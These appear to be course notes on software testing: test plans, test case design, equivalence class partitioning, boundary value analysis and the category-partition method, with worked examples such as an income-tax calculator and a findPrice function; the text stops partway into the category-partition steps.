Test Plan: the set of ideas that guide a test project Test Strategy: the set of ideas that guide test design Test Logistics: the set of ideas that guide the application of resources to fulfil a

test strategy

While developing a test plan, one should be sure that it is simple, complete, current, and accessible by the appropriate individuals for feedback and approval. A good test plan flows logically and minimizes redundant testing, demonstrates full functional coverage, provides workable procedures for monitoring, tracking, and reporting test status, contains a clear definition of the roles and responsibilities of the parties involved, target delivery dates, and clearly documents the test results.

There are two ways of building a test plan. The first approach is a master test plan which provides an overview of each detailed test plan, i.e., a test plan of a test plan. A detailed test plan verifies a particular phase in the waterfall development life cycle. Test plan examples include unit, integration, system, acceptance. Other detailed test plans include application enhancements, regression testing, and package installation. Unit test plans are code orientated and very detailed but short because of their limited scope. System or acceptance test plans focus on the functional test or black-box view of the entire system, not just a software unit. The second approach is one test plan. This approach includes all the test types in one test plan, often called the acceptance/system test plan, but covers unit, integration, system, and acceptance testing and all the planning considerations to complete the tests. A major component of a test plan, often in the Test Procedure section, is a test case. A test case defines the step-by-step process whereby a test is executed. It includes the objectives and conditions of the test, the steps needed to set up the test, the data inputs, the expected results, and the actual results. Other information such as the software, environment, version, test ID, screen, and test type are also provided. Major steps to develop a test plan: A test plan is the basis for accomplishing testing and should be considered a living document, i.e., as the application changes, the test plan should change. A good test plan encourages the attitude of “quality before design and coding.” It is able to demonstrate that it contains full functional coverage, and the test cases trace back to the functions being tested. It also contains workable mechanisms for monitoring and tracking discovered defects and report status. The following are the major steps that need to be completed to build a good test plan:

• Define the Test Objectives. The first step for planning any test is to establish what is to be accomplished as a result of the testing. This step ensures that all responsible individuals contribute to the definition of the test criteria that will be used. The developer of a test plan determines what is going to be accomplished with the test, the specific tests to be performed, the test expectations, the critical success factors of the test, constraints, scope of the tests to be performed, the expected end products of the test, a final system summary report, and the final signatures and approvals. The test objectives are reviewed and approval for the objectives is obtained.

• Develop the Test Approach. The test plan developer outlines the overall approach or how each test will be performed. This includes the testing techniques that will be used, test entry criteria, test exit criteria, procedures to coordinate testing activities with development, the test management approach,

such as defect reporting and tracking, test progress tracking, status reporting, test resources and skills, risks, and a definition of the test basis (functional requirement specifications, etc.).

• Define the Test Environment. The test plan developer examines the physical test facilities, defines the hardware, software, and networks, determines which automated test tools and support tools are required, defines the help desk support required, builds special software required for the test effort, and develops a plan to support the above.

• Develop the Test Specifications. The developer of the test plan forms the test team to write the test specifications, develops test specification format standards, divides up the work tasks and work breakdown, assigns team members to tasks, and identifies features to be tested. The test team documents the test specifications for each feature and cross-references them to the functional specifications. It also identifies the inter dependencies and work flow of the test specifications and reviews the test specifications.

• Schedule the Test. The test plan developer develops a test schedule based on the resource availability and development schedule, compares the schedule with deadlines, balances resources and work load demands, defines major checkpoints, and develops contingency plans.

• Review and Approve the Test Plan. The test plan developer or manager schedules a review meeting with the major players, reviews the plan in detail to ensure it is complete and workable, and obtains approval to proceed.

An effective test plan comprises of the following 16 essential parts:

1) Test plan identification: A unique identifier is to be allocated so that the test plan document can be distinguished from all other documents.

2) Brief Introduction: A summary of the software to be tested. A brief description and history may be included to set the context. References to other relevant documents useful for understanding the test plan are appropriate. Definitions of unfamiliar terms may be included.

3) Items to be tested: A comprehensive list of software items that are to be tested is to be documented. It is the gist of software application areas that is the object of testing.

4) Features to be tested: A comprehensive list of characteristics of all the items to be tested. These include functionality, performance, security, portability, usability, etc.

5) Features not to be tested: Identifies characteristics of the items that need not be covered under our testing effort along-with brief outline of reasons of not doing so.

6) Approach of testing: It covers the overall approach to testing that will ensure that all items and their features will be adequately tested.

7) Acceptance criteria: It describes the criteria for determining whether each test item has passed or failed during testing.

8) Suspension criteria and resumption requirements: It describes different conditions under which testing will be suspended and the subsequent conditions under which testing will be resumed.

9) Test deliverables: It describes the documents expected to be created as a part of the testing process.

10) Testing tasks: It describes set of tasks required to perform the testing.

11) Environmental requirements: It specifies the environment required to perform the testing including hardware, software, communications, facilities, tools, people, etc.

12) Responsibilities: Identifies the individuals or group of people responsible for executing the testing related tasks.

13) Manpower and training needs: Specifies the number and types of persons required to perform the testing, including the skills needed.

14) Schedule of testing: Defines the important key milestones and dates in the testing process.

15) Risks and contingencies: Identifies high-risk assumptions of the testing plan. Specifies prevention and mitigation plans for each one of them.

16) Approval Responsibility: It defines the names and titles of every individualn who must approve the plan.

Test cases DEFINITION

A test case is a set of conditions or variables under which a tester will determine whether a system under test satisfies requirements or works correctly.

The process of developing test cases can also help find problems in the requirements or design of an application.

A test case is a document, which has a set of test data, preconditions, expected results and post conditions, developed for a particular test scenario in order to verify compliance against a specific requirement.

Test Case acts as the starting point for the test execution, and after applying a set of input values, the application has a definitive outcome and leaves the system at some end point or also known as execution post condition.

WRITING GOOD TEST CASES

• As far as possible, write test cases in such a way that you test only one thing at a time. Do not overlap or complicate test cases. Attempt to make your test cases ‘atomic’.

• Ensure that all positive scenarios and negative scenarios are covered. • Language:

o Write in simple and easy to understand language. o Use active voice: Do this, do that. o Use exact and consistent names (of forms, fields, etc).

• Characteristics of a good test case: o Accurate: Exacts the purpose. o Economical: No unnecessary steps or words. o Traceable: Capable of being traced to requirements. o Repeatable: Can be used to perform the test over and over. o Reusable: Can be reused if necessary.

Example:

Let us say that we need to check an input field that can accept maximum of 10 characters.

While developing the test cases for the above scenario, the test cases are documented the following way. In the below example, the first case is a pass scenario while the second case is a FAIL. If the expected result doesn't match with the actual result, then

we log a defect. The defect goes through the defect life cycle and the testers address the same after fix.

A good test case has certain characteristics which are:

1. Should be accurate and tests what it is intended to test. 2. No unnecessary steps should be included in it. 3. It should be reusable. 4. It should be traceable to requirements. 5. It should be compliant to regulations. 6. It should be independent i.e. You should be able to execute it in any order without any dependency on other test cases. 7. It should be simple and clear, any tester should be able to understand it by reading once. 8. Now keeping in mind these characteristics you can write good and effective test cases.

Objectives behind running the test cases.

1. Find the defects in software products 2. Verify that the software meets the end user requirements 3. Improve software quality 4. Minimize the maintenance and software support costs 5. Avoid post deployment risks 6. Compliance with processes 7. Help management to make software delivery decisions

TEST CASE TEMPLATE

A test case can have the following elements. Note, however, that normally a test management tool is used by companies and the format is determined by the tool used.

Test Execution Phases

Test cases are written after careful study of the requirements and specifications of the testing itself. They are designed to suit the different testing phases and can be classified as:

• Unit Test Case – It comprises of the test conditions to test the software code and assess its feasibility. The code is compiled and run according to the test case and every line of code is tested thoroughly. It’s also called ‘white-box’ function testing case as it goes into the intricate details of the code and ensures

that they are working correctly; it’s usually done by the development team rather than the test team.

• Functional Test Case – These test cases are written to test the application at the function level. Test cases are designed based on the functional aspects and system flow of the application. You need to take care of each and every function and come up with conditions that bring in thorough verification of the application.

• System Test Case – To ensure that that the application works efficiently at the system level, test designers need to write test cases that will test its performance, security, stress, recovery etc. The complete end-to-end process flow of the system is tested by using the system test case and conditions.

• User Acceptance Test Case – The acceptance test is done by the end-users of the application or a system expert, who test the application at the operational level. Based on real scenarios that the users are likely to perform, test cases are designed on a case to case basis.

Test Design Strategies

Depending on the type of application under test and the kinds of software bugs to be detected, test design strategies are selected and applied wherever appropriate. In the below section, we will discuss some of the commonly used test design strategies that testers use to develop test cases:

• Branch Coverage Test Design

Test cases are designed based on the logical expressions in the software code that determine decisions in the application. The values that satisfy all the decision conditions are used as test data inputs for each and every decision point in the software program. The branch coverage test design accomplishes a high percentage of coverage of every statement and branch of the program; therefore also called as control-flow test design or coverage-based testing.

• Boundary Value Test Design

To detect the maximum number of bugs, test designers select test data close to the domain boundary values or limits. For example, if the boundary value or limit is 50, then you would select test data around this value i.e. for 49 and 51. The boundary value test design strategy is used when the designer knows that bugs exist around the boundary values and will be easy to detect; it’s a commonly used test design strategy and very effective in achieving a high bug yield.

• Equivalence Class Partitioning

An equivalence class is a set of variable values that are considered equivalent. Test cases are called equivalent when they are designed to test the same thing and would detect bugs in a similar fashion. Equivalence class partitioning is based on the strategy

that since the test cases are similar, it’s enough to test only one or two of the characteristics instead of the entire set of test data.

• Logic Based Test Design

Every software program will have several variables that are logically related to form a decision rule. For example, ‘if AGE is greater than 60 and if EMPLOYED is NO, then OFFER TRAVEL INSURANCE must be YES’, this is a decision rule and expresses the relationship between the variables in the program. The logic based test design is used to test every logical relationship in the program and consists of several logic-based test cases.

These are just some of the test designing strategies used by testers to effectively write test cases. These are often bundled together under the larger umbrella of Quality Management

Test Generation

Requirements serve as the starting point for the generation of tests. During the initial phases of development, requirements may exist only in the minds of one or more people. These requirements, more aptly ideas, are then specified rigorously using modeling elements such as use cases, sequence diagrams, and state charts in UML. Rigorously specified requirements are often transformed into formal requirements using requirements specification languages such as Z, S, and RSML.

Any form of test generation uses a source document. In the most informal of test methods, the source document resides in the mind of the tester who generates tests based on a knowledge of the requirements. In several commercial environments, the process is a bit more formal. The tests are generated using a mix of formal and informal methods either directly from the requirements document serving as the source. In more advanced test processes, requirements serve as a source for the development of formal models.

Test generation strategies Model based: require that a subset of the requirements be modeled using a formal notation (usually graphical). Models: Finite State Machines, Timed

automata, Petri net, etc. Specification based: require that a subset of the requirements be modeled using a formal mathematical notation. Examples: B, Z, and Larch. Code based: generate tests directly from the code.

Test generation techniques

Equivalence partitioning

Equivalence Partitioning also called as equivalence class partitioning. It is abbreviated as ECP. It is a software testing technique that divides the input test data of the application under test into each partition at least once of equivalent data from which test cases can be derived.

An advantage of this approach is it reduces the time required for performing testing of a software due to less number of test cases.

• Equivalence partitioning (EP) is a specification-based or black-box technique. • It can be applied at any level of testing and is often a good technique to use first. • The idea behind this technique is to divide (i.e. to partition) a set of test

conditions into groups or sets that can be considered the same (i.e. the system should handle them equivalently), hence ‘equivalence partitioning’. Equivalence partitions are also known as equivalence classes – the two terms mean exactly the same thing.

• In equivalence-partitioning technique we need to test only one condition from each partition. This is because we are assuming that all the conditions in one partition will be treated in the same way by the software. If one condition in a partition works, we assume all of the conditions in that partition will work, and so there is little point in testing any of these others. Similarly, if one of the conditions in a partition does not work, then we assume that none of the conditions in that partition will work so again there is little point in testing any more in that partition.

Equivalence Partitioning = Equivalence Class Partitioning = ECP

• Valid Input Class = Keeps all valid inputs. • Invalid Input Class = Keeps all Invalid inputs.

Example :

The Below example best describes the equivalence class Partitioning:

Assume that the application accepts an integer in the range 100 to 999 Valid Equivalence Class partition: 100 to 999 inclusive. Non-valid Equivalence Class partitions: less than 100, more than 999, decimal numbers and alphabets/non-numeric characters.

For example, a savings account in a bank has a different rate of interest depending on the balance in the account. In order to test the software that calculates the interest due, we can identify the ranges of balance values that earn the different rates of interest. For example, 3% rate of interest is given if the balance in the account is in the range of $0 to $100, 5% rate of interest is given if the balance in the account is in the range of $100 to $1000, and 7% rate of interest is given if the balance in the account is $1000 and above, we would initially identify three valid equivalence partitions and one invalid partition as shown below.

In the above example we have identified four partitions, even though the specification mentioned only three. This shows a very important task of the tester that is a tester should not only test what is in the specification, but should also think about things that haven’t been specified. In this case we have thought of the situation where the balance is less than zero. When designing the test cases for this software we would ensure that all the three valid equivalence partitions are covered once, and we would also test the invalid partition at least once. So for example, we might choose to calculate the interest on balances of-$10.00, $50.00, $260.00 and $1348.00. Note that when we say a partition is ‘invalid’, it doesn’t mean that it represents a value that cannot be entered by a user or a value that the user isn’t supposed to enter. It just means that it is not one of the expected inputs for this particular field.

Example 2

A store in city offers different discounts depending on the purchases made by the individual. In order to test the software that calculates the discounts, we can identify the ranges of purchase values that earn the different discounts. For example, if a purchase is in the range of $1 up to $50 has no discounts, a purchase over $50 and up to $200 has a 5% discount, and purchases of $201 and up to $500 have a 10% discounts, and purchases of $501 and above have a 15% discounts.

Now we can identify 4 valid equivalence partitions and 1 invalid partition as shown below.

Equivalence Partitioning Process:

In this method the input domain data is divided into different equivalence data classes. This method is typically used to reduce the total number of test cases to a finite set of testable test cases, still covering maximum requirements.

In short it is the process of taking all possible test cases and placing them into classes. One test value is picked from each class while testing.

E.g.: If you are testing for an input box accepting numbers from 1 to 1000 then there is no use in writing thousand test cases for all 1000 valid input numbers plus other test cases for invalid data.

Using equivalence partitioning method above test cases can be divided into three sets of input data called as classes. Each test case is a representative of respective class.

So in above example we can divide our test cases into three equivalence classes of some valid and invalid inputs.

Test cases for input box accepting numbers between 1 and 1000 using Equivalence Partitioning:

1) One input data class with all valid inputs. Pick a single value from range 1 to 1000 as a valid test case. If you select other values between 1 and 1000 then result is going to be same. So one test case for valid input data should be sufficient.

2) Input data class with all values below lower limit. I.e. any value below 1, as a invalid input data test case.

3) Input data with any value greater than 1000 to represent third invalid input class.

So using equivalence partitioning you have categorized all possible test cases into three classes. Test cases with other values from any class should give you the same result.

We have selected one representative from every input class to design our test cases. Test case values are selected in such a way that largest number of attributes of equivalence class can be exercised.

Equivalence partitioning uses fewest test cases to cover maximum requirements.

Equivalence partitioning is a method to derive positive and negative test cases. Classes of input conditions called ‘Equivalence Classes’ are identified such that each member of the class causes the same kind of processing and output to occur. When to use the technique: When we generate test cases for primary flows and field level validations we use this technique. We will identify the set of cases that generate similar output and for the range of inputs. We will have separate test case for positive and negative validations

EQUIVALENCE CLASS PARTITIONING

An input domain may be too large for all its elements to be used as test input(Figure 9.8a). However, the input domain can be partitioned into a finite numberof subdomains for selecting test inputs. Each subdomain is known as an equivalenceclass (EC), and it serves as a source of at least one test input (Figure 9.8b). Theobjective of equivalence partitioning is to divide the input domain of the systemunder test into classes, or groups, of inputs. All the inputs in the same class havea similar effect on the system under test [14, 15]. An EC is a set of inputs that thesystem treats identically when the system is tested. It represents certain conditions,or predicates, on the input domain. An input condition on the input domain is apredicate over the values of the input domain. A valid input to a system is anelement of the input domain that is expected to return a nonerror value. An invalidinput is an input that is expected to return an error value. Input conditions are usedto partition the input domain into ECs for the purpose of selecting inputs.

Guidelines for EC Partitioning Equivalence classes can be derived from aninput domain by a heuristic technique. One can approximate the ECs by identifyingclasses for which different program behaviors are specified. Identification of ECsbecomes easier with experience. Myers suggests the following guidelines to identifyECs [16].

1. An input condition specifies a range [a, b] : Identify one EC for a ≤ X ≤ b

and two other classes for X < a and X > b to test the system with invalidinputs.

2. An input condition specifies a set of values : Create one EC for each ele-ment of the set and one EC for an invalid member. For example, if theinput is selected from a set of N items, then N + 1 ECs are created:(i) one EC for each element of the set {M1}, {M2}, . . . , {MN } and (ii) oneEC for elements outside the set {M1, M2, . . . , MN }.

3. Input condition specifies for each individual value: If the system handleseach valid input differently, then create one EC for each valid input. For

1

2

3

4

(a) Input domain (b) Input domain partitioned into four subdomains

Figure 9.8 (a) Too many test inputs; (b) one input selected from each subdomain.

9.4 EQUIVALENCE CLASS PARTITIONING 245

example, if the input is from a menu, then create one EC for each menuitem.

4. An input condition specifies the number of valid values (say N ): Create oneEC for the correct number of inputs and two ECs for invalid inputs—onefor zero values and one for more than N values. For example, if a programcan accept 100 natural numbers for sorting, then three ECs are created:(i) one for 100 valid input of natural numbers, (ii) one for no input value,and (iii) one for more than 100 natural numbers.

5. An input condition specifies a “must-be” value: Create one EC for amust-be value and one EC for something that is not a must-be value.For example, if the first character of a password must be a numeric char-acter, then we are required to generate two ECs: (i) one for valid values,{pswd | the first character of pswd has a numeric value}, and (ii) one forinvalid values, {pswd | the first character of pswd is not numeric}.

6. Splitting of EC : If elements in a partitioned EC are handled differentlyby the system, then split the EC into smaller ECs.

Identification of Test Cases from ECs Having identified the ECs of an inputdomain of a program, test cases for each EC can be identified by the following:

Step 1: Assign a unique number to each EC.

Step 2: For each EC with valid input that has not been covered by test cases yet,write a new test case covering as many uncovered ECs as possible.

Step 3: For each EC with invalid input that has not been covered by test cases,write a new test case that covers one and only one of the uncovered ECs.

In summary, the advantages of EC partitioning are as follows:

• A small number of test cases are needed to adequately cover a large inputdomain.

• One gets a better idea about the input domain being covered with theselected test cases.

• The probability of uncovering defects with the selected test cases based onEC partitioning is higher than that with a randomly chosen test suite of thesame size.

• The EC partitioning approach is not restricted to input conditions alone;the technique may also be used for output domains.

Example: Adjusted Gross Income. Consider a software system that computesincome tax based on adjusted gross income (AGI) according to the following rules:

If AGI is between $1 and $29,500, the tax due is 22% of AGI.

If AGI is between $29,501 and $58,500, the tax due is 27% of AGI.

If AGI is between $58,501 and $100 billion, the tax due is 36% of AGI.

246 CHAPTER 9 FUNCTIONAL TESTING

TABLE 9.10 Generated Test Cases to Cover Each Equivalence Class

Test Case Equivalence Class

Number Test Value Expected Result Being Tested

TC1 $22,000 $4,840 EC1TC2 $46,000 $12,420 EC3TC3 $68,000 $24,480 EC4TC4 $-20,000 Rejected with an error message EC2TC5 $150 billion Rejected with an error message EC5

In this case, the input domain is from $1 to $100 billion. There are three inputconditions in the example:

1. $1 ≤ AGI ≤ $29,500.

2. $29,501 ≤ AGI ≤ $58,500.

3. $58,501 ≤ AGI ≤ $100 billion.

First we consider condition 1, namely, $1 ≤ AGI ≤ $29,500, to derive two ECs:

EC1 : $1 ≤ AGI ≤ $29,500; valid input.

EC2 : AGI < 1; invalid input.

Then, we consider condition 2, namely, $29,501 ≤ AGI ≤ $58,500, to derive oneEC:

EC3 : $29,501 ≤ AGI ≤ $58,500; valid input.

Finally, we consider condition 3, namely, $58,501 ≤ AGI ≤ $100 billion, to derivetwo ECs:

EC4 : $58,501 ≤ AGI ≤ $100 billion; valid input.

EC5 : AGI > $100 billion; invalid input.

Note that each condition was considered separately in the derivation of ECs. Con-ditions are not combined to select ECs. Five test cases are generated to cover thefive ECs, as shown in Table 9.10.

In the EC partition technique, a single test input is arbitrarily selected tocover a specific EC. We need to generate specific test input by considering theextremes, either inside or outside of the defined EC partitions. This leads us to thenext technique, known as boundary value analysis, which focuses on the boundaryof the ECs to identify test inputs.

Boundary value analysis

What is a Boundary Value

A boundary value is any input or output value on the edge of an equivalence partition.

Let us take an example to explain this:

Suppose you have a software which accepts values between 1-1000, so the valid partition will be (1-1000), equivalence partitions will be like:

And the boundary values will be 1, 1000 from valid partition and 0,1001 from invalid partitions.

Boundary Value Analysis is a black box test design technique where test case are designed by using boundary values, BVA is used in range checking.

What is Boundary Testing?

Boundary value analysis is a type of black box or specification based testing technique in which tests are performed using the boundary values.

Example:

An exam has a pass boundary at 50 percent, merit at 75 percent and distinction at 85 percent. The Valid Boundary values for this scenario will be as follows:

49, 50 - for pass 74, 75 - for merit 84, 85 - for distinction

Boundary values are validated against both the valid boundaries and invalid boundaries.

The Invalid Boundary Cases for the above example can be given as follows:

0 - for lower limit boundary value 101 - for upper limit boundary value

Example:2

A store in city offers different discounts depending on the purchases made by the individual. In order to test the software that calculates the discounts, we can identify the ranges of purchase values that earn the different discounts. For example, if a purchase is in the range of $1 up to $50 has no discounts, a purchase over $50 and up to $200 has a 5% discount, and purchases of $201 and up to $500 have a 10% discounts, and purchases of $501 and above have a 15% discounts.

We can identify 4 valid equivalence partitions and 1 invalid partition as shown below.

From this table we can identify the boundary values of each partition. We assume that two decimal digits are allowed.

Boundary values for Invalid partition: 0.00 Boundary values for valid partition(No Discounts): 1, 50 Boundary values for valid partition(5% Discount): 51, 200 Boundary values for valid partition(10% Discount): 201,500 Boundary values for valid partition(15% Discount): 501, Max allowed number in the software application

• Boundary value analysis (BVA) is based on testing at the boundaries between partitions.

• Here we have both valid boundaries (in the valid partitions) and invalid boundaries (in the invalid partitions).

• As an example, consider a printer that has an input option of the number of copies to be made, from 1 to 99. To apply boundary value analysis, we will take the minimum and maximum (boundary) values from the valid partition (1 and 99 in this case) together with the first or last value respectively in each of the invalid partitions adjacent to the valid partition (0 and 100 in this case). In this example

we would have three equivalence partitioning tests (one from each of the three partitions) and four boundary value tests. Consider the bank system described in the previous section in equivalence partitioning.

Boundary value analysis is a test case design technique to test boundary value between partitions (both valid boundary partition and invalid boundary partition). A boundary value is an input or output value on the border of an equivalence partition, includes minimum and maximum values at inside and outside boundaries. Normally Boundary value analysis is part of stress and negative testing.

Using Boundary Value Analysis technique tester creates test cases for required input field. For example; an Address text box which allows maximum 500 characters. So, writing test cases for each character once will be very difficult so that will choose boundary value analysis.

Example 1

Suppose you have very important tool at office, accepts valid User Name and Password field to work on that tool, and accepts minimum 8 characters and maximum 12 characters. Valid range 8-12, Invalid range 7 or less than 7 and Invalid range 13 or more than 13.

Write Test Cases for Valid partition value, Invalid partition value and exact boundary value.

• Test Cases 1: Consider password length less than 8.

http://www.softwaretestingclass.com/wp-content/uploads/2013/11/example-for-boundary-value-analysis1.png

• Test Cases 2: Consider password of length exactly 8.• Test Cases 3: Consider password of length between 9 and 11.• Test Cases 4: Consider password of length exactly 12.• Test Cases 5: Consider password of length more than 12.

Advantages:

a) Very good at exposing potential user interface/user input problems

b) Very clear guide lines on determining test cases

c) Very small set of test cases generated

Disadvantages:

a) Does not test all possible inputs

b) Does not test dependencies between combinations of inputs

BOUNDARY VALUE ANALYSIS

The central idea in boundary value analysis (BVA) is to select test data near the boundary of a data domain so that data both within and outside an EC are selected.

9.5 BOUNDARY VALUE ANALYSIS 247

It produces test inputs near the boundaries to find failures caused by incorrectimplementation of the boundaries. Boundary conditions are predicates that applydirectly on and around the boundaries of input ECs and output ECs. In practice,designers and programmers tend to overlook boundary conditions. Consequently,defects tend to be concentrated near the boundaries between ECs. Therefore, testdata are selected on or near a boundary. In that sense, the BVA technique isan extension and refinement of the EC partitioning technique [17]. In the BVAtechnique, the boundary conditions for each EC are analyzed in order to generatetest cases.

Guidelines for BVA As in the case of EC partitioning, the ability to develophigh-quality effective test cases using BVA requires experience. The guidelinesdiscussed below are applicable to both input conditions and output conditions. Theconditions are useful in identifying high-quality test cases. By high-quality testcases we mean test cases that can reveal defects in a program.

1. The EC specifies a range: If an EC specifies a range of values, thenconstruct test cases by considering the boundary points of the range andpoints just beyond the boundaries of the range. For example, let an ECspecify the range of −10.0 ≤ X ≤ 10.0. This would result in test data{−9.9 − 10.0, −10.1} and {9.9, 10.0, 10.1}.

2. The EC specifies a number of values : If an EC specifies a number ofvalues, then construct test cases for the minimum and the maximum valueof the number. In addition, select a value smaller than the minimum and avalue larger than the maximum value. For example, let the EC specificationof a student dormitory specify that a housing unit can be shared by oneto four students; test cases that include 1, 4, 0, and 5 students would bedeveloped.

3. The EC specifies an ordered set : If the EC specifies an ordered set, suchas a linear list, table, or sequential file, then focus attention on the firstand last elements of the set.

Example: Let us consider the five ECs identified in our previous example tocompute income tax based on AGI. The BVA technique results in test as followsfor each EC. The redundant data points may be eliminated.

EC1 : $1 ≤ AGI ≤ $29,500; This would result in values of $1, $0, $–1,$1.50 and $29,499.50, $29,500, $29,500.50.

EC2 : AGI < 1; This would result in values of $1, $0, $–1, $–100 billion.

EC3 : $29,501 ≤ AGI ≤ $58,500; This would result in values of $29,500,$29,500.50, $29,501, $58,499, $58,500, $58,500.50, $58,501.

EC4 : $58,501 ≤ AGI ≤ $100 billion; This would result in values of $58,500,$58,500.50, $58,501, $100 billion, $101 billion.

248 CHAPTER 9 FUNCTIONAL TESTING

EC5 : AGI > $100 billion; This would result in $100 billion, $101 billion,$10000 billion.

Remark. Should we test for an AGI value of $29,500.50 (i.e., between the parti-tions), and if so, what should be the result? Since we have not been told whetherthe decimal values are actually possible, the best decision to make is to test forthis value and report the result.

Category partition method

The Category partition Method is a systematic approach to the generation of test from requirements. The method consists of a mix of manual and automated steps. A method for creating functional test suites has been developed in which a test engineer analyzes the system specification, writes a series of formal test specifications, and then uses a generator tool to produce test descriptions from which test scripts are written.

The advantages of this method are that the tester can easily modify the test specification

when necessary, and can control the complexity and number of the tests by annotating the

tests specification with constraints.

It is a systematic, specification based method that uses partitioning to generate functional

tests for complex software systems.

The method includes the use of formal test specifications and is supported by a generator

tool that produces test case descriptions from test specifications.

The method goes through a series of decompositions, starting with the original functional

specification, and continuing through the individual details of each subprogram being

tested.

The Category Partition Method (CPM) is a systematic, specification based methodology

that uses an informal functional specification to produce formal test specification

The test designer’s key job is to develop categories, which are defined to be the major

characteristics of the input domain of the function under test

Each category is partitioned into equivalence classes of inputs called choices

The choices in each category must be disjoint, and together the choices in each category

must cover the input domain

The main characteristics of the category-partition method include the following:

A. The test specification is a concise and uniform representation of the test information

for a function.

B. The test specification can be easily modified, if this is necessitated by changes in the

functional specification of a command; mistakes in an original test specification; and a

desire for more or fewer test cases.

C. The test specification gives the tester a logical way to control the volume of tests.

D. The generator tool provides an automated way to produce thorough tests for each

function, and to avoid impossible or undesirable combinations of parameters and

environments.

E. The method emphasizes both the specification coverage and the error detection aspects

of testing.

It helps software testers create test cases by refining the functional specification of a

program into test specifications. It identifies the elements that influence the functions of

the program and generates test cases by methodically varying these elements over all

values of interest.

The method consists of the following steps:

1. Decompose the functional specification into functional units that can be tested

independently.

2. Identify the parameters (the explicit inputs to a functional unit) and environment

conditions (the state of the system at the time of execution) that affect the execution

behavior of the function.

3. Find categories (major properties or characteristics) of information that characterize

each parameter and environment condition.

4. Partition each category into choices, which include all the different kinds of values that

are possible for that category.

5. Determine the constraints among the choices of different categories. For example, one

choice may require that another is absent, or has a particular value.

6. Write the test specification (which is a list of categories, choices, and constraints in a

predefined format) using the test specification language TSL.

7. Use a generator to produce test frames from the test specification. Each generated test

frame is a set of choices such that each category contributes no more than one choice.

8. For each generated test frame, create a test case by selecting a single element from

each choice in that test frame.

Decompose the functional specification into functional units

Method for creating test suites

– Role of test engineer

• Analyze the system specification

• Write a series of formal test specifications

– Automatic generator

• Produces test frames

It helps software testers create test cases by refining the functional specification of a

program into test specifications. It identifies the elements that influence the functions of

the program and generates test cases by methodically varying these elements over all

values of interest.

– Characteristics of functional units

• They can be tested independently

• Examples

– A top-level user command

– Or a function

• Decomposition may require several stages

• Similar to high-level decomposition done by software designers

– May be reused, although independent decomposition is recommended

Examine each functional unit

– Identify parameters

• Explicit input to the functional unit

- Environmental conditions

• Characteristics of the system’s state

Test Cases

– Specific values of parameters

– And environmental conditions

“Test cases are chosen to maximize chances of finding errors”

• For each parameter & environmental condition

– Find categories

• Major property or characteristic

• Examples

– Browsers, Operating Systems, array size

• For each category

– Find choices

» Examples: (IE 5.0, IE 4.5, Netscape 7.0), (WindowsNT, Linux), (100, 0, -1)

Develop “Formal Test Specification” for each functional unit

– List of categories

– Lists of choices within each category

• Constraints

• Automatically produces a set of “test frames”

– Consists of a set of choices

Steps in the generation of tests using the category-partition method

Rewrite Test Specification

Analyze specification

Identify Categories

Partition Categories

Identify Constraints

Process specification

Evaluate generator output

Generate test scripts

Functional Specification

Functional Units

Categories

Choices

Constraints

Test specification

Test frames

Test frames

Test scripts

A Tester transforms requirements into test specifications.

These test specifications consist of categories corresponding to program inputs and

environment objects.

Each category is partitioned into choices that correspond to one or more values for the

input or the state of an environment object.

Test specifications also contain constraints on the choices so that only reasonable and

valid sets of tests are generated.

Test specifications are input to a test-frame generator that produces a number of test

frames from which test scripts are generated.

A test frame is a collection of choices, one corresponding to each category.

A test frame serves as a template for one or more test cases that are combined into one or

more test scripts.

(Summary) The method comprise of the following steps:

Step 1. Analyze the Specification

Step 2. Identify Categories

Step 3. Partition the Categories into Choices

Step 4. Determine Constraints among Choices

Step 5. Formalize and Evaluate the Test Specification

Step 6. Generate and Validate the Test Cases

Analyze the specification. The tester identifies individual functional units that can be

separately tested. For each unit, the tester identifies:

1. parameters of the functional unit;

2. characteristics of each parameter;

3. objects in the environment whose state could affect the functional unit’s operation;

4. characteristics of each environment object.

The tester then classifies these items into categories that have an effect on the behavior of

the functional unit.

Partition the categories into choices. The tester determines the different significant

cases that can occur within each parameter/environment category.

Determine constraints among the choices. The tester decides how the choices interact,

how the occurrence of one choice can affect the existence of another, and what special

restrictions might affect any choice.

Write and process test specification. The category, choice, and constraint information is

written in a formal Test Specification. The written specification is then processed by a

generator that produces a set of test frames for the functional unit.

Evaluate generator output. The tester examines the test frames produced by the

generator, and determines if any changes to the test specification are necessary. Reasons

for changing the test specification include the absence of some obviously necessary test

situation, the appearance of impossible test combinations, or a judgment that too many

test cases have been produced.

If the specification must be changed, Step D is repeated.

Transform into test scripts. When the test specification is stable, the tester converts the

test frames produced by the tool into test cases, and organizes the test cases into test

scripts.

Example : findPrice

Syntax: fP(code, quantity, weight)

Function: findPrice takes three inputs: code, qty, and weight Item code is represented by

string of eight digits contained in variable code. The quantity purchased is contained in

qty. The weight of the item purchased is contained in weight.

Function fP accesses a database to find and display the unit price, the description, and the

total price of the item corresponding to code.

fP is required to display error message, and return, if either of the three inputs is

incorrect.

The leftmost digit of the code decides hoe the values of qty and weight are to be used.

code is an eight digit string that denotes product type.

fP is concerned with only the leftmost digit that is interpreted as follows:

Leftmost digit Interpretation

0 Ordinary grocery items such as bread, magazines,

and soup.

2 Variable-weight items such as meats, fruits and

vegetables.

3 Health related items such as band aids, dettol and

cotton.

5 Coupon; digit2(dollars), 3 and 4(cents) specify the

discount.

1,6-9 Unused.

The use of parameters qty and weight depends on the leftmost digit in code.

qty indicates the quantity purchased, an integer, when the left most digit is 0 or 3; weight

is ignored.

weight is the weight of the item purchased when the leftmost digit is 2; quantity is

ignored.

qty is the value of the discount when the leftmost digit is 5; again weight is ignored.

when the leftmost digit is 5, the second digit from the left specifies dollar amount and the

third and fourth digits are cents.

Steps used in Category –Partition Method

Step 1: Analyze specification

In this step, the tester identifies each functional unit that can be tested separately.

For large systems, a functional unit may correspond to a subsystem that can be tested

Independently.

The subsystem can be further subdivided leading to independently testable subunits.

The subdivision process terminates depending on what is to be tested.

In this example, we assume that fP is an independently testable subunit of an application.

Thus we will derive tests for fP.

Step 2: Identify Categories

For each testable unit, the given specification is analyzed and the inputs isolated.

In addition, the objects in the environment, for example, file also need to be identified.

Next, the characteristics of each parameter and environment object is determined.

A characteristic is referred to as a Category.

Some characteristics are stated explicitly, others might need to be derived by a careful

examination of the Specification.

fP has three input parameters: code, qty, weight.The specification mention various

characteristics of these Parameters such as their type and interpretation. qty and weight

are related to code.

The database accessed by fP is an environment object.

code: length, leftmost digit, remaining digits

qty: integer

weight: float

database: contents

Step 3: Partition Categories

